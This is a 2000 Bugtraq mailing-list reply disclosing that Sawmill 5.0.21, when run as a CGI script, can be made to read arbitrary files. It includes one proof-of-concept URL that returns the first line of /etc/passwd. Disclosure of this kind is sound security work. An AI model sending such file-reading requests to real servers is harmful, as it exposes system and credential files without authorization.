[15524] in bugtraq
Re: sawmill5.0.21 path bug
daemon@ATHENA.MIT.EDU (Cashdollar, Larry)
Wed Jun 28 17:28:34 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.21.0006271533010.5166-100000@localhost.localdomain>
Date: Tue, 27 Jun 2000 15:36:45 -0700
Reply-To: lwc@VAPID.DHS.ORG
From: "Cashdollar, Larry" <lwc@VAPID.DHS.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Sawmill can also be run as a cgi script. This method is vulnerable as
well.
The following will print the first line of the password file
http://www.example.com/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
-- Larry Cashdollar
